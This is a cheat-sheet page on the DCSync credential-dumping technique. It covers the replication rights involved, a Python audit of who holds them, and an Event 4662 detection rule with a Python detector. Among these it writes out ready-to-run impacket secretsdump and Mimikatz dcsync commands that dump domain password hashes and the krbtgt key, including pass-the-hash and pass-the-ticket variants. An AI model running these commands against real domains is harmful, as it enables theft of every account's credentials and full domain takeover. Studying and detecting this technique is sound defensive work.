DCSync
MITRE ATT&CK T1003.006
Dump Password Hashes from Domain Controller
DCSync is a credential dumping technique. The adversary simulates the replication behaviour of a Domain Controller and asks a real DC to replicate directory data, including account password hashes and Kerberos keys, over the Directory Replication Service Remote Protocol (MS-DRSR, the DRSUAPI RPC interface). It cannot be disabled, because MS-DRSR is a core service of Active Directory that domain controllers rely on to replicate with each other; the defence is to restrict who holds the replication rights and to monitor their use.
The attack does not strictly require Domain Admin membership: it requires the extended rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain naming context (the domain object, e.g. dc=dc1,dc=local). Members of Administrators, Domain Admins, Enterprise Admins and Domain Controllers hold these rights by default, and any other principal that has been granted them (a misconfigured service account, for example) can DCSync as well.
# PowerView: list the ACEs on the domain object that grant the replication extended rights (who can DCSync)
Get-ObjectAcl -DistinguishedName "dc=dc1,dc=local" -ResolveGUIDs | ?{ $_.ObjectType -match 'ds-replication-get-changes' }
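The PowerView query above answers the question online. As an added example (not code from the original page), the following Python script does the same check offline against the domain object's DACL exported as SDDL, for instance with `(Get-Acl "AD:\DC=dc1,DC=local").Sddl` in PowerShell. It parses the object ACEs, keeps only allow ACEs carrying the control-access bit for one of the replication extended-right GUIDs, and lists the principals that hold both rights DCSync needs. The SDDL string, the domain SID and the RID 1105 principal are constructed for the demo; the script deliberately does not resolve group nesting or deny ACEs, so treat its output as the direct grants only.

```python
import re
from collections import defaultdict

# Extended rights (controlAccessRight GUIDs) involved in replication. The first two
# together are what DCSync needs; the third only covers filtered attributes (RODCs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DCSYNC_NEEDED = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}

# Well-known SDDL SID abbreviations that show up on the domain object
SID_ALIASES = {
    "BA": "BUILTIN\\Administrators", "DA": "Domain Admins", "EA": "Enterprise Admins",
    "DD": "Domain Controllers", "ED": "Enterprise Domain Controllers", "SY": "Local System",
}

ADS_RIGHT_DS_CONTROL_ACCESS = 0x100          # the "CR" bit of an access mask
DACL_RE = re.compile(r"D:(?:P|AI|AR)*((?:\([^)]*\))+)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def has_control_access(mask):
    """True if an SDDL rights field (two-letter codes or 0x hex) includes CR."""
    if mask.lower().startswith("0x"):
        return bool(int(mask, 16) & ADS_RIGHT_DS_CONTROL_ACCESS)
    # Tokenise in pairs so that e.g. 'LCRP' (LC + RP) is not mistaken for CR
    return "CR" in {mask[i:i + 2] for i in range(0, len(mask), 2)}


def parse_dacl(sddl):
    """Yield (ace_type, rights, object_guid, sid) for every ACE in the DACL part."""
    m = DACL_RE.search(sddl)
    if not m:
        return
    for ace in ACE_RE.finditer(m.group(1)):
        fields = ace.group(1).split(";")
        if len(fields) < 6:
            continue
        yield fields[0], fields[2], fields[3].lower(), fields[5]


def replication_rights(sddl):
    """Map each principal granted a replication extended right to the rights it holds.
    Only allow object ACEs (OA) count; deny ACEs and group nesting are not resolved."""
    rights = defaultdict(set)
    for ace_type, mask, guid, sid in parse_dacl(sddl):
        if ace_type != "OA" or guid not in REPLICATION_RIGHTS:
            continue
        if has_control_access(mask):
            rights[SID_ALIASES.get(sid, sid)].add(REPLICATION_RIGHTS[guid])
    return dict(rights)


def dcsync_capable(sddl):
    """Principals holding both rights DCSync requires, sorted for stable output."""
    return sorted(p for p, r in replication_rights(sddl).items() if DCSYNC_NEEDED <= r)


# Constructed sample DACL with a fictitious domain SID; on a real domain export it with
# PowerShell:  (Get-Acl "AD:\DC=dc1,DC=local").Sddl
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;EA)"
    "(OA;;0x100;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;EA)"      # same right, hex mask
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"         # DCs: Get-Changes only here
    "(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;DD)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1105)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1105)"  # rogue grant
    "(A;;LCRPLORC;;;AU)"                                        # generic read, no CR
)

if __name__ == "__main__":
    for principal, held in sorted(replication_rights(SAMPLE_SDDL).items()):
        print(f"{principal:40} {', '.join(sorted(held))}")
    print("Can DCSync:", dcsync_capable(SAMPLE_SDDL))
```

Anything in the "Can DCSync" list that is not Administrators, Domain Admins or Enterprise Admins (here the RID 1105 principal) is the finding to chase: resolve the SID, check how it got the rights, and treat it as equivalent to Domain Admin.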
# impacket secretsdump.py performs DCSync over DRSUAPI; the target is written domain/user[:password]@DC
# -just-dc dumps only the NTDS secrets (all domain hashes); -just-dc-user <name> limits it to one account
# using a plaintext password
secretsdump.py -outputfile 'file.name' 'domain'/'User':'PASSWORD'@'Domain Controller IP'
secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]
# with Pass-the-Hash (the LM half may be left empty, i.e. -hashes :'NThash')
secretsdump.py -outputfile 'file.name' -hashes 'LMhash':'NThash' 'domain'/'User'@'Domain Controller IP'
# with Pass-the-Ticket (Kerberos auth from the ccache in KRB5CCNAME; use the DC hostname, not its IP, so the SPN matches)
secretsdump.py -k -no-pass -outputfile 'file.name' 'domain'/'User'@'Domain Controller hostname'

ZeroLogon Exploit
Secrets Dump

Sauna 10.10.10.175
Pass-the-Hash Attack
# Mimikatz DCSync from PowerShell: replicate a single account (here krbtgt of domain dc01) instead of the whole NTDS
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dc01\krbtgt"'

Detection: on the domain controllers, monitor Windows Security Event ID 4662 (An operation was performed on an object; the Audit Directory Service Access subcategory must be enabled) for events whose Properties field contains one of the replication extended-right GUIDs: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes), 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Domain controllers generate these events during normal replication, so exclude the DC computer accounts (and known sync accounts such as Azure AD Connect) and alert on everything else; a non-DC subject requesting DS-Replication-Get-Changes-All is a strong DCSync indicator. On the wire, DRSUAPI (DsGetNCChanges) traffic from a host that is not a domain controller is the same signal.
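The detection rule above, as an added example that is not part of the original page: a small Python detector run over constructed 4662 records (the EventData fields flattened to a dict, as a SIEM or a `Get-WinEvent` export would deliver them). It matches the replication GUIDs in Properties, checks the control-access bit in AccessMask, and suppresses only the named domain controller accounts rather than every account ending in `$`, because a workstation or machine account that was granted the rights can DCSync too. The domain DC1, the accounts and the object GUIDs other than the well-known schema and right GUIDs are fictitious.

```python
import re

# Replication extended rights as they appear in the Properties field of Event 4662
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100        # AccessMask bit for an extended (control access) right
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}")


def dcsync_alert(event, known_dc_accounts):
    """Return an alert dict if this 4662 EventData record looks like DCSync, else None.

    known_dc_accounts: sAMAccountNames of the domain controllers (e.g. {'DC02$'}).
    Only these are suppressed; other computer accounts ($) still alert, because an
    attacker who controls a workstation or a fresh machine account can DCSync too
    if that account was granted the rights.
    """
    if str(event.get("EventID")) != "4662":
        return None
    if not int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS:
        return None
    guids = set(GUID_RE.findall(event.get("Properties", "").lower()))
    hits = guids & set(REPLICATION_RIGHTS)
    if not hits:
        return None
    subject = event["SubjectUserName"]
    if subject.upper() in {a.upper() for a in known_dc_accounts}:
        return None                      # legitimate DC-to-DC replication
    return {
        "subject": f"{event['SubjectDomainName']}\\{subject}",
        "rights": sorted(REPLICATION_RIGHTS[g] for g in hits),
        "object": event["ObjectName"],
    }


def detect_dcsync(events, known_dc_accounts):
    """Run the rule over a batch of records and keep the alerts, in input order."""
    return [a for a in (dcsync_alert(e, known_dc_accounts) for e in events) if a]


# Constructed sample records (EventData of Event 4662 flattened to a dict). The domain
# DC1 and its accounts are fictitious. %%7688 is the "Control Access" access-type
# string and 19195a5b-... is the domainDNS class, i.e. the object is the domain itself.
DOMAIN_OBJECT = "%{a1b2c3d4-0000-4000-8000-000000000001}"   # constructed objectGUID
REPL_PROPS = ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")
SAMPLE_EVENTS = [
    # A real DC replicating: expected, suppressed by the allow-list
    {"EventID": 4662, "SubjectDomainName": "DC1", "SubjectUserName": "DC02$",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "ObjectName": DOMAIN_OBJECT,
     "AccessMask": "0x100", "Properties": REPL_PROPS},
    # A user account pulling Get-Changes + Get-Changes-All: DCSync
    {"EventID": 4662, "SubjectDomainName": "DC1", "SubjectUserName": "jdoe",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "ObjectName": DOMAIN_OBJECT,
     "AccessMask": "0x100", "Properties": REPL_PROPS},
    # A workstation computer account, not a DC: must still alert
    {"EventID": 4662, "SubjectDomainName": "DC1", "SubjectUserName": "WS01$",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "ObjectName": DOMAIN_OBJECT,
     "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Unrelated control-access right (User-Force-Change-Password) on a user object: noise
    {"EventID": 4662, "SubjectDomainName": "DC1", "SubjectUserName": "helpdesk",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "ObjectName": "CN=bob,CN=Users,DC=dc1,DC=local", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{00299570-246d-11d0-a768-00aa006e0529}"
                   "\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]
KNOWN_DCS = {"DC01$", "DC02$"}

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, KNOWN_DCS):
        print(f"DCSync suspected: {alert['subject']} used "
              f"{', '.join(alert['rights'])} on {alert['object']}")
```

Feed the allow-list from the Domain Controllers OU rather than hard-coding it, and keep it short: every name on it is an account whose DCSync activity you will never see.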